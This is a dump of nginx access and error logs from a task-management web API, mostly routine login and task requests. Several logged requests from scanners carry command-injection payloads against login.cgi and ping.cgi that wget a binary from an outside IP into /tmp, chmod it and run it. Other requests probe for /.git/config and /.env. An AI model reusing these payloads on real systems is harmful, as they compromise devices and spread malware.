15.158.241.109 - - [13/Apr/2026:02:30:49 +0000] "POST /api/auth/login HTTP/1.1" 200 348 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.109 - - [13/Apr/2026:02:30:49 +0000] "POST /api/tasks HTTP/1.1" 201 336 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.109 - - [13/Apr/2026:02:30:51 +0000] "GET /api/tasks HTTP/1.1" 401 211 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:30:52 +0000] "GET /api/tasks HTTP/1.1" 200 184 "https://d3jotedl3xn7u4.cloudfront.net/tasks" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:30:52 +0000] "GET /api/users HTTP/1.1" 200 2347 "https://d3jotedl3xn7u4.cloudfront.net/tasks" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:30:55 +0000] "GET /api/tasks HTTP/1.1" 200 12 "https://d3jotedl3xn7u4.cloudfront.net/tasks/14" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:30:55 +0000] "GET /api/tasks/14 HTTP/1.1" 403 252 "https://d3jotedl3xn7u4.cloudfront.net/tasks/14" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:30:55 +0000] "GET /api/users HTTP/1.1" 200 2347 "https://d3jotedl3xn7u4.cloudfront.net/tasks/14" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:31:25 +0000] "DELETE /api/tasks/14 HTTP/1.1" 204 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:32:26 +0000] "POST /api/auth/register HTTP/1.1" 201 155 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:32:26 +0000] "POST /api/auth/login HTTP/1.1" 200 348 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.102 - - [13/Apr/2026:02:32:26 +0000] "POST /api/auth/register HTTP/1.1" 201 154 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.102 - - [13/Apr/2026:02:32:26 +0000] "POST /api/auth/login HTTP/1.1" 200 348 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.109 - - [13/Apr/2026:02:32:26 +0000] "POST /api/tasks HTTP/1.1" 201 334 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.102 - - [13/Apr/2026:02:32:28 +0000] "GET /api/tasks HTTP/1.1" 401 211 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:32:30 +0000] "GET /api/users HTTP/1.1" 200 2549 "https://d3jotedl3xn7u4.cloudfront.net/tasks" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:32:30 +0000] "GET /api/tasks HTTP/1.1" 200 184 "https://d3jotedl3xn7u4.cloudfront.net/tasks" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:32:32 +0000] "GET /api/users HTTP/1.1" 200 2549 "https://d3jotedl3xn7u4.cloudfront.net/tasks" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:32:32 +0000] "GET /api/tasks HTTP/1.1" 200 12 "https://d3jotedl3xn7u4.cloudfront.net/tasks" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.102 - - [13/Apr/2026:02:32:33 +0000] "GET /api/tasks HTTP/1.1" 200 12 "https://d3jotedl3xn7u4.cloudfront.net/tasks/15" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.109 - - [13/Apr/2026:02:32:33 +0000] "GET /api/tasks/15 HTTP/1.1" 403 252 "https://d3jotedl3xn7u4.cloudfront.net/tasks/15" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.102 - - [13/Apr/2026:02:32:33 +0000] "GET /api/users HTTP/1.1" 200 2549 "https://d3jotedl3xn7u4.cloudfront.net/tasks/15" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.102 - - [13/Apr/2026:02:32:34 +0000] "GET /api/tasks/15 HTTP/1.1" 403 252 "https://d3jotedl3xn7u4.cloudfront.net/tasks/15/edit" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.102 - - [13/Apr/2026:02:32:34 +0000] "GET /api/tasks HTTP/1.1" 200 12 "https://d3jotedl3xn7u4.cloudfront.net/tasks/15/edit" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.77 - - [13/Apr/2026:02:32:34 +0000] "GET /api/users HTTP/1.1" 200 2549 "https://d3jotedl3xn7u4.cloudfront.net/tasks/15/edit" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.102 - - [13/Apr/2026:02:32:34 +0000] "PUT /api/tasks/15 HTTP/1.1" 403 243 "https://d3jotedl3xn7u4.cloudfront.net/tasks/15/edit" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.109 - - [13/Apr/2026:02:32:35 +0000] "GET /api/users HTTP/1.1" 200 2549 "https://d3jotedl3xn7u4.cloudfront.net/tasks/15" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.76 - - [13/Apr/2026:02:32:35 +0000] "GET /api/tasks HTTP/1.1" 200 12 "https://d3jotedl3xn7u4.cloudfront.net/tasks/15" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.109 - - [13/Apr/2026:02:32:35 +0000] "GET /api/tasks/15 HTTP/1.1" 403 252 "https://d3jotedl3xn7u4.cloudfront.net/tasks/15" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.76 - - [13/Apr/2026:02:32:35 +0000] "DELETE /api/tasks/15 HTTP/1.1" 403 243 "https://d3jotedl3xn7u4.cloudfront.net/tasks/15" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:32:35 +0000] "GET /api/tasks/15 HTTP/1.1" 200 330 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:32:37 +0000] "GET /api/users HTTP/1.1" 200 2549 "https://d3jotedl3xn7u4.cloudfront.net/tasks/new" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:32:37 +0000] "GET /api/tasks HTTP/1.1" 200 12 "https://d3jotedl3xn7u4.cloudfront.net/tasks/new" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:32:40 +0000] "GET /api/users HTTP/1.1" 200 2549 "https://d3jotedl3xn7u4.cloudfront.net/tasks" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:32:40 +0000] "GET /api/tasks HTTP/1.1" 200 184 "https://d3jotedl3xn7u4.cloudfront.net/tasks" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.109 - - [13/Apr/2026:02:32:40 +0000] "GET /api/users HTTP/1.1" 401 217 "https://d3jotedl3xn7u4.cloudfront.net/tasks" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.109 - - [13/Apr/2026:02:32:40 +0000] "GET /api/tasks HTTP/1.1" 401 217 "https://d3jotedl3xn7u4.cloudfront.net/tasks" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:32:41 +0000] "DELETE /api/tasks/15 HTTP/1.1" 204 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:33:13 +0000] "POST /api/auth/login HTTP/1.1" 200 348 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:33:13 +0000] "DELETE /api/tasks/15 HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
45.79.207.71 - - [13/Apr/2026:02:36:05 +0000] "GET / HTTP/1.1" 401 202 "-" "Mozilla/5.0 zgrab/0.x" "-"
72.49.246.191 - - [13/Apr/2026:02:36:50 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://37.48.254.120/arm7%20-O%20/tmp/arm7;chmod%20777%20/tmp/arm7;/tmp/arm7%27$ HTTP/1.1" 400 150 "-" "r00ts3c" "-"
15.158.241.69 - - [13/Apr/2026:02:46:04 +0000] "POST /api/auth/login HTTP/1.1" 200 279 "https://d3jotedl3xn7u4.cloudfront.net/login" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:46:04 +0000] "GET /api/users HTTP/1.1" 200 2549 "https://d3jotedl3xn7u4.cloudfront.net/tasks" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:46:04 +0000] "GET /api/tasks HTTP/1.1" 200 742 "https://d3jotedl3xn7u4.cloudfront.net/tasks" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:46:12 +0000] "GET /api/tasks/5 HTTP/1.1" 200 339 "https://d3jotedl3xn7u4.cloudfront.net/tasks/5" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:46:17 +0000] "GET /api/tasks HTTP/1.1" 200 742 "https://d3jotedl3xn7u4.cloudfront.net/tasks" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:49:16 +0000] "POST /api/auth/login HTTP/1.1" 200 348 "-" "curl/8.7.1" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:49:19 +0000] "GET /api/tasks HTTP/1.1" 401 210 "-" "curl/8.7.1" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:49:20 +0000] "GET /api/tasks HTTP/1.1" 401 203 "-" "curl/8.7.1" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:49:50 +0000] "GET /api/tasks HTTP/1.1" 200 12 "-" "curl/8.7.1" "240b:252:1cc4:f00:359a:65f7:91d9:8642"


----------------------------------------
/var/log/nginx/error.log
----------------------------------------
2026/04/12 21:20:56 [warn] 161155#161155: *173 using uninitialized "hour" variable while logging request, client: 20.169.108.15, server: , request: "MGLNDD_13.113.189.119_80"
2026/04/12 21:31:48 [error] 161155#161155: *174 connect() failed (111: Connection refused) while connecting to upstream, client: 84.201.14.163, server: , request: "GET /.git/config HTTP/1.1", upstream: "http://127.0.0.1:5000/.git/config", host: "13.113.189.119"
2026/04/12 21:34:37 [error] 161155#161155: *176 connect() failed (111: Connection refused) while connecting to upstream, client: 2.57.31.207, server: , request: "GET /.env HTTP/1.1", upstream: "http://127.0.0.1:5000/.env", host: "13.113.189.119"
2026/04/12 21:34:38 [error] 161155#161155: *178 connect() failed (111: Connection refused) while connecting to upstream, client: 2.57.31.207, server: , request: "POST / HTTP/1.1", upstream: "http://127.0.0.1:5000/", host: "13.113.189.119"
2026/04/12 21:37:45 [error] 161155#161155: *180 connect() failed (111: Connection refused) while connecting to upstream, client: 85.11.167.114, server: , request: "GET /.git/config HTTP/1.1", upstream: "http://127.0.0.1:5000/.git/config", host: "13.113.189.119"
2026/04/12 21:43:10 [error] 161154#161154: *182 connect() failed (111: Connection refused) while connecting to upstream, client: 123.57.94.251, server: , request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:5000/", host: "ec2-13-113-189-119.ap-northeast-1.compute.amazonaws.com"
2026/04/12 22:00:56 [error] 161154#161154: *184 connect() failed (111: Connection refused) while connecting to upstream, client: 27.148.196.60, server: , request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:5000/", host: "13.113.189.119"
2026/04/12 22:14:44 [warn] 161154#161154: *186 using uninitialized "year" variable while logging request, client: 70.112.135.163, server: , request: "GET /ping.cgi?pingIpAddress=google.fr;wget%20http://37.48.254.120/arm7%20-O%20/tmp/arm7;chmod%20777%20/tmp/arm7;/tmp/arm7%27/&sessionKey=1039 HTTP/1.1"
2026/04/12 22:14:44 [warn] 161154#161154: *186 using uninitialized "month" variable while logging request, client: 70.112.135.163, server: , request: "GET /ping.cgi?pingIpAddress=google.fr;wget%20http://37.48.254.120/arm7%20-O%20/tmp/arm7;chmod%20777%20/tmp/arm7;/tmp/arm7%27/&sessionKey=1039 HTTP/1.1"
2026/04/12 22:14:44 [warn] 161154#161154: *186 using uninitialized "day" variable while logging request, client: 70.112.135.163, server: , request: "GET /ping.cgi?pingIpAddress=google.fr;wget%20http://37.48.254.120/arm7%20-O%20/tmp/arm7;chmod%20777%20/tmp/arm7;/tmp/arm7%27/&sessionKey=1039 HTTP/1.1"
2026/04/12 22:14:44 [warn] 161154#161154: *186 using uninitialized "hour" variable while logging request, client: 70.112.135.163, server: , request: "GET /ping.cgi?pingIpAddress=google.fr;wget%20http://37.48.254.120/arm7%20-O%20/tmp/arm7;chmod%20777%20/tmp/arm7;/tmp/arm7%27/&sessionKey=1039 HTTP/1.1"
2026/04/12 22:43:40 [warn] 161154#161154: *187 using uninitialized "year" variable while logging request, client: 64.127.150.84, server: , request: "GET /login.cgi?cli=aa%20aa%27;wget%20http://37.48.254.120/arm7%20-O%20/tmp/arm7;chmod%20777%20/tmp/arm7;/tmp/arm7%27$ HTTP/1.1"
2026/04/12 22:43:40 [warn] 161154#161154: *187 using uninitialized "month" variable while logging request, client: 64.127.150.84, server: , request: "GET /login.cgi?cli=aa%20aa%27;wget%20http://37.48.254.120/arm7%20-O%20/tmp/arm7;chmod%20777%20/tmp/arm7;/tmp/arm7%27$ HTTP/1.1"
2026/04/12 22:43:40 [warn] 161154#161154: *187 using uninitialized "day" variable while logging request, client: 64.127.150.84, server: , request: "GET /login.cgi?cli=aa%20aa%27;wget%20http://37.48.254.120/arm7%20-O%20/tmp/arm7;chmod%20777%20/tmp/arm7;/tmp/arm7%27$ HTTP/1.1"
2026/04/12 22:43:40 [warn] 161154#161154: *187 using uninitialized "hour" variable while logging request, client: 64.127.150.84, server: , request: "GET /login.cgi?cli=aa%20aa%27;wget%20http://37.48.254.120/arm7%20-O%20/tmp/arm7;chmod%20777%20/tmp/arm7;/tmp/arm7%27$ HTTP/1.1"
2026/04/12 22:44:48 [warn] 161154#161154: *188 using uninitialized "year" variable while logging request, client: 205.210.31.173, server: , request: " î  êکظأثڈ¹é¼'eù"
2026/04/12 22:44:48 [warn] 161154#161154: *188 using uninitialized "month" variable while logging request, client: 205.210.31.173, server: , request: " î  êکظأثڈ¹é¼'eù"
2026/04/12 22:44:48 [warn] 161154#161154: *188 using uninitialized "day" variable while logging request, client: 205.210.31.173, server: , request: " î  êکظأثڈ¹é¼'eù"
2026/04/12 22:44:48 [warn] 161154#161154: *188 using uninitialized "hour" variable while logging request, client: 205.210.31.173, server: , request: " î  êکظأثڈ¹é¼'eù"
2026/04/12 22:44:48 [warn] 161154#161154: *189 using uninitialized "year" variable while logging request, client: 205.210.31.173, server: , request: " ت  ئfs¬mزph‚M5@nق\q bلحے? <ه H`6Wwk  hججہ/ہ+ہ0ہ,ہہہ'ہ#ہہ	ہ(ہ$ہہ"
2026/04/12 22:44:48 [warn] 161154#161154: *189 using uninitialized "month" variable while logging request, client: 205.210.31.173, server: , request: " ت  ئfs¬mزph‚M5@nق\q bلحے? <ه H`6Wwk  hججہ/ہ+ہ0ہ,ہہہ'ہ#ہہ	ہ(ہ$ہہ"
2026/04/12 22:44:48 [warn] 161154#161154: *189 using uninitialized "day" variable while logging request, client: 205.210.31.173, server: , request: " ت  ئfs¬mزph‚M5@nق\q bلحے? <ه H`6Wwk  hججہ/ہ+ہ0ہ,ہہہ'ہ#ہہ	ہ(ہ$ہہ"
2026/04/12 22:44:48 [warn] 161154#161154: *189 using uninitialized "hour" variable while logging request, client: 205.210.31.173, server: , request: " ت  ئfs¬mزph‚M5@nق\q bلحے? <ه H`6Wwk  hججہ/ہ+ہ0ہ,ہہہ'ہ#ہہ	ہ(ہ$ہہ"
2026/04/12 23:05:44 [error] 161154#161154: *190 connect() failed (111: Connection refused) while connecting to upstream, client: 18.218.118.203, server: , request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:5000/", host: "13.113.189.119"
2026/04/12 23:06:23 [warn] 161154#161154: *192 using uninitialized "year" variable while logging request, client: 18.218.118.203, server: , request: " {  w‎Uِ1lسLî»:"L*sطûoع،دٌwےQ‹×Yˆ$ة{  ہ/ہ+ہہہہ	ہہ"
2026/04/12 23:06:23 [warn] 161154#161154: *192 using uninitialized "month" variable while logging request, client: 18.218.118.203, server: , request: " {  w‎Uِ1lسLî»:"L*sطûoع،دٌwےQ‹×Yˆ$ة{  ہ/ہ+ہہہہ	ہہ"
2026/04/12 23:06:23 [warn] 161154#161154: *192 using uninitialized "day" variable while logging request, client: 18.218.118.203, server: , request: " {  w‎Uِ1lسLî»:"L*sطûoع،دٌwےQ‹×Yˆ$ة{  ہ/ہ+ہہہہ	ہہ"
2026/04/12 23:06:23 [warn] 161154#161154: *192 using uninitialized "hour" variable while logging request, client: 18.218.118.203, server: , request: " {  w‎Uِ1lسLî»:"L*sطûoع،دٌwےQ‹×Yˆ$ة{  ہ/ہ+ہہہہ	ہہ"
2026/04/12 23:06:26 [warn] 161154#161154: *193 using uninitialized "year" variable while logging request, client: 18.218.118.203, server: , request: "SSH-2.0-Go"
2026/04/12 23:06:26 [warn] 161154#161154: *193 using uninitialized "month" variable while logging request, client: 18.218.118.203, server: , request: "SSH-2.0-Go"
2026/04/12 23:06:26 [warn] 161154#161154: *193 using uninitialized "day" variable while logging request, client: 18.218.118.203, server: , request: "SSH-2.0-Go"
2026/04/12 23:06:26 [warn] 161154#161154: *193 using uninitialized "hour" variable while logging request, client: 18.218.118.203, server: , request: "SSH-2.0-Go"
2026/04/12 23:06:27 [warn] 161154#161154: *194 using uninitialized "year" variable while logging request, client: 18.218.118.203, server: , request: " {  w،¹ذèخھ؟µ½R”ّç¯»sA!¥ٹa¦¦dو  ہ/ہ+ہہہہ	ہہ"
2026/04/12 23:06:27 [warn] 161154#161154: *194 using uninitialized "month" variable while logging request, client: 18.218.118.203, server: , request: " {  w،¹ذèخھ؟µ½R”ّç¯»sA!¥ٹa¦¦dو  ہ/ہ+ہہہہ	ہہ"
2026/04/12 23:06:27 [warn] 161154#161154: *194 using uninitialized "day" variable while logging request, client: 18.218.118.203, server: , request: " {  w،¹ذèخھ؟µ½R”ّç¯»sA!¥ٹa¦¦dو  ہ/ہ+ہہہہ	ہہ"
2026/04/12 23:06:27 [warn] 161154#161154: *194 using uninitialized "hour" variable while logging request, client: 18.218.118.203, server: , request: " {  w،¹ذèخھ؟µ½R”ّç¯»sA!¥ٹa¦¦dو  ہ/ہ+ہہہہ	ہہ"
2026/04/12 23:20:00 [error] 161154#161154: *195 connect() failed (111: Connection refused) while connecting to upstream, client: 20.83.27.89, server: , request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:5000/", host: "13.113.189.119"
2026/04/12 23:44:33 [warn] 161154#161154: *197 using uninitialized "year" variable while logging request, client: 3.130.168.2, server: 
2026/04/12 23:44:33 [warn] 161154#161154: *197 using uninitialized "month" variable while logging request, client: 3.130.168.2, server: 
2026/04/12 23:44:33 [warn] 161154#161154: *197 using uninitialized "day" variable while logging request, client: 3.130.168.2, server: 
2026/04/12 23:44:33 [warn] 161154#161154: *197 using uninitialized "hour" variable while logging request, client: 3.130.168.2, server: 
2026/04/12 23:44:37 [error] 161154#161154: *198 connect() failed (111: Connection refused) while connecting to upstream, client: 3.130.168.2, server: , request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:5000/", host: "13.113.189.119"
2026/04/12 23:51:07 [warn] 161154#161154: *200 using uninitialized "year" variable while logging request, client: 3.130.168.2, server: , request: " {  wآ Mcڈ]0´ض@&كرoذ¦SُûP*‎‏gجس%¦ظ¾~  ہ/ہ+ہہہہ	ہہ"
2026/04/12 23:51:07 [warn] 161154#161154: *200 using uninitialized "month" variable while logging request, client: 3.130.168.2, server: , request: " {  wآ Mcڈ]0´ض@&كرoذ¦SُûP*‎‏gجس%¦ظ¾~  ہ/ہ+ہہہہ	ہہ"
2026/04/12 23:51:07 [warn] 161154#161154: *200 using uninitialized "day" variable while logging request, client: 3.130.168.2, server: , request: " {  wآ Mcڈ]0´ض@&كرoذ¦SُûP*‎‏gجس%¦ظ¾~  ہ/ہ+ہہہہ	ہہ"
2026/04/12 23:51:07 [warn] 161154#161154: *200 using uninitialized "hour" variable while logging request, client: 3.130.168.2, server: , request: " {  wآ Mcڈ]0´ض@&كرoذ¦SُûP*‎‏gجس%¦ظ¾~  ہ/ہ+ہہہہ	ہہ"
2026/04/12 23:53:13 [warn] 161154#161154: *201 using uninitialized "year" variable while logging request, client: 3.130.168.2, server: , request: "SSH-2.0-Go"
2026/04/12 23:53:13 [warn] 161154#161154: *201 using uninitialized "month" variable while logging request, client: 3.130.168.2, server: , request: "SSH-2.0-Go"
2026/04/12 23:53:13 [warn] 161154#161154: *201 using uninitialized "day" variable while logging request, client: 3.130.168.2, server: , request: "SSH-2.0-Go"
2026/04/12 23:53:13 [warn] 161154#161154: *201 using uninitialized "hour" variable while logging request, client: 3.130.168.2, server: , request: "SSH-2.0-Go"
2026/04/12 23:56:31 [warn] 161154#161154: *202 using uninitialized "year" variable while logging request, client: 3.130.168.2, server: , request: " {  w`¨نB،جٌ›ƒêGمپ·m†§€J¥ص{‡ڑا•  ہ/ہ+ہہہہ	ہہ"
2026/04/12 23:56:31 [warn] 161154#161154: *202 using uninitialized "month" variable while logging request, client: 3.130.168.2, server: , request: " {  w`¨نB،جٌ›ƒêGمپ·m†§€J¥ص{‡ڑا•  ہ/ہ+ہہہہ	ہہ"
2026/04/12 23:56:31 [warn] 161154#161154: *202 using uninitialized "day" variable while logging request, client: 3.130.168.2, server: , request: " {  w`¨نB،جٌ›ƒêGمپ·m†§€J¥ص{‡ڑا•  ہ/ہ+ہہہہ	ہہ"
